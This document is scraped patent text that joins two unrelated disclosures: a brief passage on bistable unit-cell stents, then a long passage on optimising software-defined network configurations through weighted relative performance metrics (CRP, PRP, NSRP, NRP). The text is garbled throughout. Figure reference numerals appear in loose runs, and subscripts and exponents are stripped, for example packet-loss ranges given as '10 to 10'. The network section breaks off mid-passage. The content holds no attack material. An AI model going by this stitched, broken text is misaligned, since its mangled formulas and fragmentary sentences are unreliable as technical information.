Another part of the invention is the use of one or more unit cells in other medical applications such as, for example, an expander or a clip, either to spread a body cavity open or to clamp or hold a body part or some body tissue.
The invention is also directed to the use of the inventive stents in conjunction with inventive expander rings to join together two vessels.
The invention is also directed to a bistable valve having a snap-action bipositional unit cell and uses for the same, in particular, to prevent incontinence.
The invention is also directed to multistable cells and their use in medical devices.
The construction of the present stent includes a series of elements with an arrangement of unit cells that enable the stability in a special way. Each unit cell exists out of at least two distinct, mechanically connected sections with different mechanical behaviors. One section acts as a relatively rigid support for the more flexible counteracting section. The more flexible section is responsible for most, if not all, of the expansion of the stent. There are several ways to manufacture a stent based upon this principle and it can be made from several materials, like polymers, composites, conventional metals or shape memory alloys with superelastic behavior or with temperature sensitive behavior.
It can be made from an arrangement of wire or strip, welded together at specific places. Another possibility is metal deposition in the desired pattern onto a substrate or the use of sintering of prealloyed powder.
A further method is making the stent from a tubular shaped starting material, with a pattern of slits or slots made in the wall by means of etching, grinding, cutting (e.g., with a laser, water, etc.), spark erosion or any other suitable method. The pattern can also be made in a flat plate and then welded, brazed or crimped to a more or less cylindrical shape or a cylindrical mid section with two conical ends with larger diameters.
| |
The present disclosure relates to a method and apparatus for optimizing a software defined network configuration using a policy-based network performance metric.
In software defined networks (SDNs), data plane processing, which includes the physical forwarding of data between endpoints in the network, is decoupled from control plane processing, which includes making decisions concerning which routes in the SDN are to be used to forward the data between the network endpoints. The topography of an SDN may change dynamically as nodes (e.g., virtual and/or physical nodes) and/or interconnecting links (virtual and/or physical) are added and/or removed from the network.
In one example, a method and apparatus for optimizing a software defined network configuration are disclosed. In one example, the method determines a first network relative performance parameter for a current configuration of a network, based on respective weighting profiles associated with services for which the network carries data. The method then determines a second network relative performance parameter for a proposed configuration of the network, based on the respective weighting profiles associated with the services for which the network carries data. The proposed configuration is implemented in the network when the second network relative performance parameter is greater than the first network relative performance parameter.
In another example, a non-transitory computer-readable storage device storing a plurality of instructions which, when executed by a processor, cause the processor to perform operations. The operations include determining a first network relative performance parameter for a current configuration of a network, based on respective weighting profiles associated with services for which the network carries data, determining a second network relative performance parameter for a proposed configuration of the network, based on the respective weighting profiles associated with the services for which the network carries data, and implementing the proposed configuration in the network when the second network relative performance parameter is greater than the first network relative performance parameter.
In another example, an apparatus includes a processor and a computer-readable storage device storing a plurality of instructions which, when executed by the processor, cause the processor to perform operations. The operations include determining a first network relative performance parameter for a current configuration of a network, based on respective weighting profiles associated with services for which the network carries data, determining a second network relative performance parameter for a proposed configuration of the network, based on the respective weighting profiles associated with the services for which the network carries data, and implementing the proposed configuration in the network when the second network relative performance parameter is greater than the first network relative performance parameter.
To facilitate understanding, identical reference numerals have been used, where possible, to designate identical elements that are common to the figures.
Large, complex, distributed software defined networks (SDNs) using network function virtualization (NFV) are being deployed to deliver services to customers. SDN configurations, including selection and placement of components, storage, computation facilities, and interconnections, are typically manually configured by network engineers. In addition, policies that act upon the networks' components are also typically manually defined. These policies manage the networks with a goal of optimizing the delivery of services within the constraints imposed by various parameters, including software lifecycles, operations support systems, business support systems, and applications. These manual procedures tend to be labor intensive and time consuming (e.g., not responsive in real time), and may result in less than optimal solutions due to the networks' configuration complexity.
The present disclosure broadly describes a method, a computer-readable storage device, and an apparatus for optimizing a software defined network configuration using a policy-based network performance metric. According to examples of the present disclosure, an application allows a network, such as a software defined network, to self-optimize by identifying potential incremental changes to its configuration and estimating the effects of the potential incremental changes on overall network performance. In one example, the potential effects of a proposed incremental change are estimated as a metric, referred to as a “relative network performance metric,” that can be compared to a similar metric estimated for a current configuration of the network. If a potential incremental change results in an improvement in the metric, then the potential incremental change is deployed. In one example, potential incremental changes are identified and evaluated periodically or dynamically in response to changing network conditions not including service failures.
Examples of the present disclosure balance the requirements of various services that are supported by the network (i.e., services for which the network carries data) in order to determine the configuration that supports all services in the most optimal manner. For instance, the requirements (e.g., rules, policies, etc.) for traffic routing behavior may vary depending on the service for which the traffic is being routed. For example, voice, video, messaging, data transfer, and other new and innovative services may have different traffic routing requirements or other requirements.
FIG. 1
FIG. 1
100
105
100
110
100
110
110
110
110
110
110
115
120
illustrates a block diagram of an example communication network including an example configuration selector to determine an optimal network configuration in accordance with the teachings of this disclosure. The example communication network of includes example network components forming a network topology capable of routing traffic (e.g., packets, flows, etc.) between endpoints of the network . The example network components include network nodes and network links interconnecting the nodes. For example, the nodes in the example network components may include, but are not limited to, switches, routers, gateways, etc., or any combination thereof. The links in the example network components may include, but are not limited to, dedicated links, shared links, optical links, wireless links, etc., or any combination thereof. Furthermore, the network nodes in the example network components may be physical nodes and/or virtual nodes, and the network links in the example network components may be physical links and/or virtual links. Accordingly, the example network components include example physical network components and/or example virtual network components .
FIG. 1
105
125
110
100
125
125
110
125
110
125
110
125
In the illustrated example of , the configuration selector includes an example graph database to store network topology information representing the arrangement(s) of the network components in the example network . The example graph database utilizes graph nodes, graph edges and properties to represent and store data. Elements in the graph database contain pointers to adjacent elements to avoid the need for the index lookups associated with conventional relational databases. For example, the nodes in the network components can be represented in the graph database with graph nodes and associated properties, the links in the network components can be represented in the graph database with graph edges and associated properties, and the interconnections of the nodes and links of the network components can be represented in the graph database using pointers between the appropriate graph nodes and graph edges.
125
110
110
110
125
130
130
110
100
110
125
110
135
130
135
110
110
125
The network topology information stored by the graph database includes information specifying the components (e.g., nodes, links, etc.) included in the network, the arrangement (e.g., interconnections) of the components , performance measurements (e.g., delay, jitter, path loss, bandwidth, reliability, etc.) for the different components , etc. In some examples, the graph database receives the network topology information from one or more example network controllers , such as one or more SDN controllers , responsible for (i) managing the addition and removal of network components to/from the network , (ii) downloading routing information to the network components, and (iii) monitoring the performance of the network components . In some examples, the performance measurements stored in the graph database for respective ones of the example network components can additionally or alternatively be obtained by one or more example network monitor(s) , such as one or more network taps, traffic monitors, etc. In some examples, the network controller(s) and/or the network monitor(s) query respective ones of the example network components for status information including performance measurements (e.g., delay, jitter, path loss, bandwidth, reliability, etc.), utilization measurements (e.g., capacity, power consumption, etc.), for the network components . In some examples, the set of performance measurements obtained for a given network component are stored in the graph database with the topology information describing the given network component.
105
140
100
110
100
140
125
FIG. 1
FIG. 1
The example configuration selector of also includes an example optimal composition determination engine (OCDE) to evaluate and select potential configurations for the network . A configuration corresponds to an arrangement of nodes and links in the network components via which traffic corresponding to various services can be routed in the network . In the illustrated example of , the OCDE utilizes the topology information stored in the example graph database and policies specifying rules to be obeyed when evaluating different proposed configurations.
105
145
1
2
145
808
812
FIG. 1
FIG. 8
Accordingly, the example configuration selector of further includes an example policy storage to store policies. The policies may include rules that guide evaluation of proposed configurations. In one example, policies are specified according to one or more policy specification methods, such as the yet another next generation (YANG) or topology and orchestration specification for cloud applications (TOSCA) data modeling languages and/or other conditional rules. The policies may further include engineering rules (e.g., various simple operational constraints and relationships codified directly into rules). Policy specification information may include one or more of: (1) relative importance of services (e.g., relative weights) for services, for different parts of the network (e.g., local, regional, or national), across the entire global network, for specific customers or types of customers (e.g., government, emergency, enterprise, or consumer); (2) constraints required (e.g., technical, legal, or regulatory constraints); (3) goals to be met (e.g., related to service quality, latency maximums, reliability, etc.). Policies may also provide the ability to quickly change, update, or correct aspects of the methods used for determining network configurations. For instance, policies may specify conditional rules used to dynamically determine a particular pre-defined method used to determine proposed network configuration changes (e.g., for conditions A in a portion of the network, use method to propose changes there; otherwise, use method ). This will allow many methods for proposing network configuration changes to be utilized simultaneously (e.g., different methods in different portions of the network) and continuously (e.g., in an on-going sequence as conditions change locally and/or globally). Policies may also specify conditional rules for updating priorities, such as to settle conflicts when multiple proposed changes together would violate a constraint policy (e.g., such that a single “winner” must be selected), to dynamically adjust weights associated with various services, and to adjust the priorities of various types of improvements or optimizations (e.g., locally or globally). The example policy storage may be implemented by any number(s) and/or type(s) of volatile and/or non-volatile memory, storage, etc., or combination(s) thereof, such as the example volatile memory and/or the example mass storage device(s) included in the example of .
140
100
110
140
110
125
110
145
140
100
110
140
100
140
100
140
As disclosed in further detail below, the example OCDE continuously determines the optimal network configuration by (i) introducing proposed network configuration changes to be simulated by a virtual network model of the network , including changes to arrangements of the network components ; and (ii) determining performance parameters for the proposed network configuration. If the performance parameters are improved, then the OCDE may deploy the proposed network configuration changes, e.g., using existing control/orchestration functions. For example, and as disclosed in further detail below, the OCDE may determine, for a given network configuration, a performance parameter (e.g., corresponding to a component relative performance parameter, which is disclosed in further detail below) for a given one of the network components by processing the performance measurements stored in the graph database for the given one of the network components based on a weighting profile stored in the policy storage for that service. As also disclosed in further detail below, the OCDE may determine respective performance parameters (e.g., corresponding to path relative performance parameters, which are disclosed in further detail below) for respective candidate paths in the network by combining the performance parameters (e.g., the component relative performance parameters) determined for those network components included in the respective candidate paths. The example OCDE may then determine a performance parameter (e.g., corresponding to a network service relative performance parameter) for each service supported by the network by combining the performance parameters (e.g., the path relative performance parameters) determined for the service. The example OCDE may then determine a performance parameter (e.g., corresponding to network relative performance parameters) for the network by combining the performance parameters (e.g., the network service relative performance parameters) determined for the individual services. Finally, the example OCDE may select a network configuration (e.g., a current network configuration or a proposed network configuration) based on comparing the performance parameters (e.g., the network relative performance parameters) determined for different network configurations.
140
130
130
110
110
After selecting a network configuration, the example OCDE transmits configuration information descriptive of the configuration to the network controller(s) . The network controller(s) , in turn, transmit the configuration information to the appropriate network components to deploy the selected network configuration. For example, the configuration information may be transmitted to the network components between which a new link is to be established.
105
130
105
130
105
100
105
FIG. 1
FIG. 1
Although the example configuration selector of is depicted as being separate from the example network controller(s) , in some examples, the example configuration selector is implemented by one or more of the network controller(s) . Also, although the example configuration selector of is described in the context of the example network being an SDN, configuration selection as disclosed herein is not limited thereto. For example, the example configuration selector can be utilized to perform configuration selection in any network in which information describing the network components is available.
FIG. 2
FIG. 1
FIG. 2
FIG. 1
FIG. 8
140
140
205
140
125
205
125
110
100
205
816
illustrates a block diagram of an example implementation of the OCDE of . The example OCDE of includes an example graph database interface to interface the OCDE with a graph database, such as the example graph database of . For example, the graph database interface is structured to send queries to the graph database to retrieve, for example, sets of performance measurements for the example network components , sets of paths for routing traffic between pairs of endpoints in the network , etc. The example graph database interface can be implemented by any type(s), number(s) and/or combination(s) of interfaces, such as the example interface circuit of , which is described in further detail below.
140
210
110
100
210
FIG. 1
The example OCDE of also includes an example component relative performance (CRP) determiner to determine respective CRP parameters for the different network components included in the network (e.g., SDN). For example, for a given network component (e.g., node, link, etc.), the CRP determiner determines a respective CRP parameter for each service for which traffic (e.g., packets, flows, etc.) may be routed via the network component. The CRP parameter is a single value that characterizes the relative performance of the network component for routing data associated with a given service. As such, a given network component may have different CRP parameters for different services.
210
110
125
140
215
FIG. 2
In some examples, the CRP parameter determined by the example CRP determiner for a given network component and a given network service is a dimensionless parameter determined from the performance measurements (e.g., delay, jitter, packet loss, bandwidth, reliability, etc.) maintained in a graph database, such as the graph database , for the given network component. To facilitate determination of CRP parameters from combinations of measurements having different ranges of values, the example OCDE of includes an example relative performance mapper to map, for a given network component, performance measurements (e.g., delay, jitter, packet loss, bandwidth, reliability, etc.), which may have different respective ranges of values, to corresponding mapped performance parameters, which have a common range of values. The mapping for a given performance measurement may be linear or nonlinear depending on the possible range of values for the given performance measurement. The mapping may be implemented by look-up tables, normalization functions (e.g., that normalize a range of inputs to a range of normalized outputs), etc.
215
215
−2
−6
−6
−2
−4
For example, if the possible packet delay for a given network component lies in the range of 2 milliseconds (ms.) (best case) to 40 ms. (worst case), the relative performance mapper may employ a linear mapping to map a measured delay for the given network component to mapped delay parameter that is a dimensionless number in the range of 100 (best case, corresponding to 2 ms.) to 1 (worst case, corresponding to 40 ms.). In such an example, a measured delay of 3 ms. for a network component (e.g., a link) may map to a mapped delay parameter of, for example, 97. As another example, if the possible packet loss for a given network component lies in the range of 10(worst case) to 10(best case), the relative performance mapper may employ a nonlinear (e.g., logarithmic) mapping to map measured packet loss for the given network component to a mapped packet loss parameter that is a dimensionless number in the range of 100 (best case, corresponding to 10) to 1 (worst case, corresponding to 10). In such an example, a measured packet loss of 10for a network component (e.g., a link) may map to a mapped packet loss parameter of, for example, 50. In some examples, although the different performance measurements for a given network component may have different ranges and dimensions, the corresponding mapped performance parameters for these different performance measurements are dimensionless and have the same ranges (e.g., from 1, which is worst case, to 100, which is best case, or some other range).
FIG. 2
FIG. 2
210
215
110
110
110
210
110
210
110
210
110
145
In the illustrated example of , the example CRP determiner uses the mapped performance parameters determined by the relative performance mapper for a given network component to determine a particular CRP parameter for a particular service supported by the network component . In some examples, for a given network component , the example CRP determiner determines the particular CRP parameter for a particular service by weighting the mapped performance parameters for the network component based on weights tailored to the particular service, and then combining (e.g., summing, multiplying, etc.) the weighted, mapped performance parameters to determine the CRP parameter for the particular service. Because different performance characteristics may have different degrees of importance for different services, the example CRP determiner may use different weightings of the mapped performance parameters for a given network component to determine the network component's respective CRP parameters for different services. In the illustrated example of , the CRP determiner obtains the weights to be applied to the mapped performance parameters of a given network components to determine the network component's respective CRP parameters for different services from the weighting profiles stored in the example policy storage for the different services.
rd
For example, Table 1 illustrates example performance characteristics, such as packet delay requirements, packet loss requirements, etc., for different example services, such as voice over Internet protocol (VoIP) calls, video calls, online gaming, video streaming, Internet protocol multimedia subsystem (IMS) signaling, transmission control protocol (TCP) services, etc. The example services listed in Table 1 correspond to the 3Generation Partnership Project (3GPP) quality of service (QoS) class identifiers (QCIs) and priorities also listed in the table. The example services listed in Table 1 can generally be classified into two service types, namely, real-time (RT) services and non-real-time (NRT) services. RT services are typically characterized by short response times between communicating endpoints and guaranteed bit rate (GBR) requirements. RT services also typically have strict requirements regarding packet delay and jitter. VoIP is an example of an RT service.
NRT services typically do not have tight requirements concerning packet delay, although high packet delays may be unacceptable. Therefore NRT services are usually non-GBR services. For NRT services, information integrity is often an important requirement and, as such, NRT services may have low tolerance for packet loss. Web browsing is an example of an NRT service.
TABLE 1
Bearer
Pri-
Packet
Packet
QCI
Type
ority
Delay
Loss
Example
1
GBR
2
100 ms
10<sup>−2</sup>
VoIP call
2
4
150 ms
10<sup>−3</sup>
Video call
3
3
50 ms
Online Gaming (Real Time)
4
5
300 ms
10<sup>−6</sup>
Video streaming
5
Non-GBR
1
100 ms
IMS Signaling
6
6
300 ms
Video, TCP based services
e.g. email, chat, ftp etc
7
7
100 ms
10<sup>−3</sup>
Voice, Video, Interactive
gaming
8
8
300 ms
10<sup>−6</sup>
Video, TCP based services
9
9
e.g. email, chat, ftp etc
210
215
215
210
215
215
Based on the example of Table 1, delay and jitter may be important performance parameters for a voice service, whereas packet loss may be an important performance parameter for a video service. Thus, in such an example, the CRP determiner may apply larger weights to the relative delay and jitter measurements (after being mapped by the relative performance mapper , as disclosed above) and a smaller weight to the relative packet loss measurement (after being mapped by the relative performance mapper , as disclosed above) when determining, for a given network node, the CRP parameter corresponding to voice service traffic. Conversely, in such an example, the CRP determiner may apply smaller weights to the relative delay and jitter measurements (after being mapped by the relative performance mapper , as disclosed above) and a larger weight to the relative packet loss measurement (after being mapped by the relative performance mapper , as disclosed above) when determining, for the given network node, the CRP parameter corresponding to video service traffic.
210
110
100
110
110
110
210
n,s
n,s
n,p
Stated mathematically, the example CRP determiner determines, for respective ones of the network components (e.g., nodes, links, etc.) in the network , a set of CRPs, with each CRP in the set of CRPs corresponding to a respective service from a set of possible services for which traffic may be routed via the network component . The CRP for a specific network component and a specific service is represented by CRP, where n={1, . . . , N} indexes over the different network components , and s={1, . . . , S} indexes over the different possible services. The CRP determiner of the illustrated example determines CRPfor a given network component, n, and a given service, s, as a summation of weighted, mapped performance parameters, MP, for the network component, n, according to Equation 1, which is:
<math overflow="scroll"><mtable><mtr><mtd><mrow><mrow><mi>C</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>n</mi><mo>,</mo><mi>s</mi></mrow></msub></mrow><mo>=</mo><mrow><munderover><mo>∑</mo><mrow><mi>p</mi><mo>=</mo><mn>1</mn></mrow><mi>p</mi></munderover><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mrow><msub><mi>W</mi><mrow><mi>s</mi><mo>,</mo><mi>p</mi></mrow></msub><mo>×</mo><mi>M</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>n</mi><mo>,</mo><mi>p</mi></mrow></msub></mrow></mrow></mrow></mtd><mtd><mrow><mi>Equation</mi><mo>⁢</mo><mstyle><mspace width="0.8em" height="0.8ex" /></mstyle><mo>⁢</mo><mn>1</mn></mrow></mtd></mtr></mtable></math>
n,p
s,p
215
In Equation 1, MPrepresents the set of p={1, . . . , P} mapped performance parameters determined by the relative performance mapper for the given network component, n, and Wrepresents the set of p={1, . . . , P} weights specified for a given service, s.
215
215
n,p
n,p
n,p
n,1
n,2
n,3
n,p
n,p
n,1
n,2
n,3
As disclosed above, the relative performance mapper maps (e.g., normalizes) a set of performance measurements, denoted PM, p={1, . . . , P}, for a given network component, n, to a corresponding set of mapped performance parameters MP, p={1, . . . , P}. For example, the set of performance measurements, PM, for a given network component, n, may include a set of P=3 measurements, which include measured packet loss (PM), measured delay (PM) and a measured jitter (PM) for the network component. The relative performance mapper of the illustrated example maps this set performance measurements, PM, to a corresponding set of P=3 mapped performance parameters, MP, which include a mapped packet loss parameter (MP), a mapped delay parameter (MP) and a mapped jitter parameter (MP) for the network component, n.
210
145
s,p
s,1
n,1
s,2
n,2
s,3
n,3
s,p
1,1
n,1
1,2
n,2
1,3
n,3
2,1
n,1
2,2
n,2
2,3
n,3
s,p
As disclosed above, the CRP determiner of the illustrated example obtains the set of weights, W, for each service, s, from a weighting profile specified for the service and stored in the example policy storage . For example, the weighting profile for a given service, s, may specify a first weight (W) to be applied to mapped packet loss parameters (MP), a second weight (W) to be applied to mapped delay parameters (MP) and a third weight (W) to be applied to mapped jitter parameters (MP). In some examples, the weights, W, have a range of values (e.g., such as a range from 1 to 10, a range from 1 to 100, etc.), with higher weights being assigned to more important performance parameters. For example, for a video service (e.g., indexed by s=1), the weighting profile for the video service may specify W=90 as the weight to be applied to mapped packet loss parameters (MP), W=70 as the weight to be applied to mapped delay parameters (MP) and W=60 as the weight to be applied to mapped jitter parameters (MP) (e.g., because, for this video service, packet loss may be more important than delay, which may be more important than jitter). As another example, for a VoIP service (e.g., indexed by s=2), the weighting profile for the VoIP service may specify W=50 as the weight to be applied to mapped packet loss parameters (MP), W=95 as the weight to be applied to mapped delay parameters (MP) and W=75 as the weight to be applied to mapped jitter parameters (MP) (e.g., because, for this VoIP service, delay may be more important than jitter, which may be more important than packet loss). In some examples, the weighting profiles containing the sets of weights, W, for the respective services, s, are specified by a network administrator and/or other user, and may be updated as service requirements change, as new services are added, as existing services are deleted, etc.
140
210
110
100
100
140
220
205
125
220
125
220
FIG. 2
FIG. 2
The example OCDE of also uses the service-specific CRP parameters determined by the example CRP determiner for the different network components of the network to identify paths to route packets for given services from given ingress endpoints (e.g., ingress nodes) to given egress endpoints (e.g., egress nodes) of the network . In the illustrated example of , to identify a path to route packets for a given service from a particular ingress endpoint to a particular egress endpoint, the OCDE includes an example path identifier to query, via the graph database interface , a graph database, such as the graph database , to obtain a set of candidate paths that includes some or all of the possible paths for routing traffic (e.g., packets, flows, etc.) between the ingress endpoint to the egress endpoint. In some examples, the path identifier performs one or more pre-selection/filtering operations to reduce the set of possible paths returned by the graph database for routing traffic (e.g., packets, flows, etc.) between the ingress endpoint to the egress endpoint to a more manageable set of candidate paths. For example, the path identifier may exclude possible path(s) from the set of candidate paths that include a number of hops that exceeds a first threshold number, include a number of network components (e.g., nodes and/or links) that exceed a second threshold number, etc.
140
225
225
220
225
225
210
110
FIG. 2
FIG. 2
To characterize the relative performance of the different candidate paths for routing traffic for different services, the example OCDE of includes an example path relative performance (PRP) parameter determiner . In the illustrated example of , the PRP determiner determines a respective PRP parameter for each one of the set of candidate paths identified by the path identifier for routing traffic between a given pair of endpoints for a particular service. If the same candidate path is identified for routing traffic for multiple, different services between the same pair of network endpoints, the PRP determiner of the illustrated example determines respective PRP parameters for each different service. In some examples, the PRP determiner determines a PRP parameter for a particular candidate path and a particular service by combining (e.g., summing, multiplying, etc.) the particular service's CRP parameters determined by the example CRP determiner for each network component included in the candidate path.
225
100
225
r,s
r,s
n,s
Stated mathematically, the example PRP determiner determines a set of PRPs for a set of candidate paths, or routes, for routing traffic (e.g., packets, flows, etc.) for a specific service between a pair of endpoints in the network . Each PRP in the set of PRPs corresponds to a respective one of the set of candidate paths. The PRP for a specific candidate path and a specific service is represented by PRP, where r={1, . . . , R} indexes over the different candidate paths in the set of candidate paths identified between the pair of endpoints, and s={1, . . . , S} indexes over the different possible services. The PRP determiner of the illustrated example determines the PRP parameter, PRP, for a given candidate path, r, and a given service, s, as a summation of the CRP parameters, CRP, of the network components included in the candidate path, r, according to Equation 2, which is:
<math overflow="scroll"><mtable><mtr><mtd><mrow><mrow><mi>P</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>r</mi><mo>,</mo><mi>s</mi></mrow></msub></mrow><mo>=</mo><mrow><munderover><mo>∑</mo><mrow><mi>n</mi><mo>=</mo><mn>1</mn></mrow><msub><mi>N</mi><mi>r</mi></msub></munderover><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mrow><mi>C</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>n</mi><mo>,</mo><mi>s</mi></mrow></msub></mrow></mrow></mrow></mtd><mtd><mrow><mi>Equation</mi><mo>⁢</mo><mstyle><mspace width="0.8em" height="0.8ex" /></mstyle><mo>⁢</mo><mn>2</mn></mrow></mtd></mtr></mtable></math>
r
r,s
r,1
r,2
225
225
In Equation 2, the summation is over the Nnetwork components included in the candidate path, r. (Different candidate paths will generally include one or more different network components.) As illustrated by Equation 2, the example PRP determiner may determine, for a given candidate path, r, different PRP parameters, PRP, for different services. For example, for a given candidate path, r, the PRP determiner may determine a first PRP parameter (PRP) for a video service (e.g., indexed by s=1) and a second PRP parameter (PRP) for a VoIP service (e.g., indexed by s=2).
100
140
250
250
250
225
FIG. 2
FIG. 2
To characterize the relative performance of the different services supported by the network , the example OCDE of includes an example network service relative performance (NSRP) parameter determiner . In the illustrated example of , the NSRP determiner determines a respective NSRP parameter for each one of the services supported by the network. In some examples, the NSRP determiner determines an NSRP parameter for a particular service by combining (e.g., summing, multiplying, etc.) the particular service's PRP parameters determined by the example PRP determiner for each candidate path utilized by the service to route traffic.
250
100
250
s
s
r,1
r,n
Stated mathematically, the example NSRP determiner determines a NSRP for a specific service supported by the network . The NSRP for a specific service is represented by NSRP, where s={1, . . . , S} indexes over the different possible services. The NSRP determiner of the illustrated example determines the NSRP parameter, NSRP, for a given service, s, as a summation of the PRP parameters, PRPthrough PRP, of the candidate paths used by the service, s, to route traffic according to Equation 3, which is:
<math overflow="scroll"><mtable><mtr><mtd><mrow><mrow><mi>N</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>S</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mi>s</mi></msub></mrow><mo>=</mo><mrow><munderover><mo>∑</mo><mrow><mi>r</mi><mo>=</mo><mn>1</mn></mrow><mi>R</mi></munderover><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mrow><mi>P</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>r</mi><mo>,</mo><mi>s</mi></mrow></msub></mrow></mrow></mrow></mtd><mtd><mrow><mi>Equation</mi><mo>⁢</mo><mstyle><mspace width="0.8em" height="0.8ex" /></mstyle><mo>⁢</mo><mn>3</mn></mrow></mtd></mtr></mtable></math>
In Equation 3, the summation is over the R candidate paths used by the service, s.
100
140
255
255
255
250
145
FIG. 2
FIG. 2
To characterize the relative performance of a proposed configuration for network , the example OCDE of includes an example network relative performance (NRP) parameter determiner . In the illustrated example of , the NRP determiner determines a respective NRP parameter for each proposed configuration for the network. In some examples, the NRP determiner determines an NRP parameter for a particular configuration by combining (e.g., summing, multiplying, etc.) the particular configuration's NSRP parameters determined by the example NSRP determiner . The NSRP parameters may be weighted according to weights for all services, e.g., as specified by one or more policies in the policy storage .
255
100
255
Stated mathematically, the example NRP determiner determines an NRP for a specific configuration of the network . The NRP for a specific configuration is represented by NRP. The NSP determiner of the illustrated example determines the NRP parameter, NRP, for a given configuration of the network as a summation of the NSRP parameters according to Equation 4, which is:
<math overflow="scroll"><mtable><mtr><mtd><mrow><mrow><mi>N</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>P</mi></mrow><mo>=</mo><mrow><munderover><mo>∑</mo><mrow><mi>k</mi><mo>=</mo><mn>1</mn></mrow><mi>n</mi></munderover><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mrow><msub><mi>W</mi><mrow><mi>s</mi><mo>,</mo><mi>k</mi></mrow></msub><mo>×</mo><mi>N</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>S</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><mi>R</mi><mo>⁢</mo><mstyle><mspace width="0.3em" height="0.3ex" /></mstyle><mo>⁢</mo><msub><mi>P</mi><mrow><mi>s</mi><mo>,</mo><mi>k</mi></mrow></msub></mrow></mrow></mrow></mtd><mtd><mrow><mi>Equation</mi><mo>⁢</mo><mstyle><mspace width="0.8em" height="0.8ex" /></mstyle><mo>⁢</mo><mn>4</mn></mrow></mtd></mtr></mtable></math>
FIG. 2
140
230
205
125
230
100
100
In the illustrated example of , to identify a proposed configuration for a network, the OCDE includes an example configuration identifier to query, via the graph database interface , a graph database, such as the graph database , to obtain a proposed configuration for the network. The example configuration identifier may further comprise functionality for constructing a virtual network model of the network . The virtual network model may be used to simulation operation of the network under various configurations, including the proposed configuration, in real time. In one example, the proposed configuration represents an incremental change over a current configuration of the network.
140
260
100
260
FIG. 2
The example RCDE of further includes an example configuration evaluator to evaluate the NRP parameters determined for a proposed configuration and a current configuration and to select a configuration for the network . In some examples, the configuration evaluator selects the configuration with the best (e.g., highest) NRP parameter.
FIG. 2
260
100
130
130
110
100
In the illustrated example of , the configuration evaluator transmits configuration information describing the arrangement of nodes and links for different configurations of the network to one or more network controllers, such as the network controller(s) . The network controller(s) , in turn, transmit this configuration information to the appropriate network components , which, for example, update their respective connections to establish new links in the network according to the selected configuration.
255
210
110
100
210
110
125
225
235
240
210
205
110
125
225
205
125
110
220
FIG. 2
As disclosed above, in some examples, the example NRP determiner indirectly uses the sets of CRP parameters determined by the example CRP determiner for the respective network components in the network to determine the NRP parameters for proposed network configurations. In some examples, the CRP determiner stores the sets of CRP parameters determined for the respective network components in the graph database for subsequent retrieval by the PRP determiner (which is represented by solid lines and in the illustrated example of ). For example, the CRP determiner may use the graph database interface to store a set of CRP parameters determined for a given network component with the topology information maintained by the graph database for that network component. In some such examples, the PRP determiner may use the graph database interface to query the graph database to retrieve the sets of CRP parameters for the network components included in the candidate paths identified by the example path identifier .
210
110
225
245
210
110
220
225
FIG. 2
Additionally or alternatively, in some examples, the CRP determiner determines the sets of CRP parameters for given network components as they are needed by the PRP determiner for determining PRP parameters (which is represented by a dashed line in the illustrated example of ). For example, the CRP determiner may determine the sets of CRP parameters for those network components included in the candidate paths identified by the example path identifier , and then provide the determined sets of CRP parameters to the PRP determiner for use in determining the respective PRP parameters for the candidate paths.
FIG. 3
FIG. 1
FIG. 3
FIG. 3
FIG. 3
300
140
125
105
205
300
125
110
100
100
100
125
110
125
140
110
is a block diagram illustrating example information exchanged between the example OCDE and the example graph database of the example configuration selector of . In some examples, the graph database interface is used to exchange the information illustrated in . As illustrated in the example block diagram of , the example graph database stores network topology information for the network components included in the network . Such network topology information can include, but is not limited to, information describing the nodes and links included in the network , their respective characteristics (e.g., such as capacities, bandwidths, etc.) and their arrangement in the network (e.g., such as the interconnections between the nodes and links). The example graph database of also stores respective sets of performance measurements (e.g., delay, jitter, path loss, bandwidth, reliability, etc.) for the network components represented by the stored topology information. Furthermore, in some examples, the graph database stores respective sets of service-specific CRP parameters determined, as described above, by the example OCDE for the network components represented by the stored topology information.
FIG. 3
FIG. 3
140
205
305
125
110
125
140
110
110
140
205
310
110
125
205
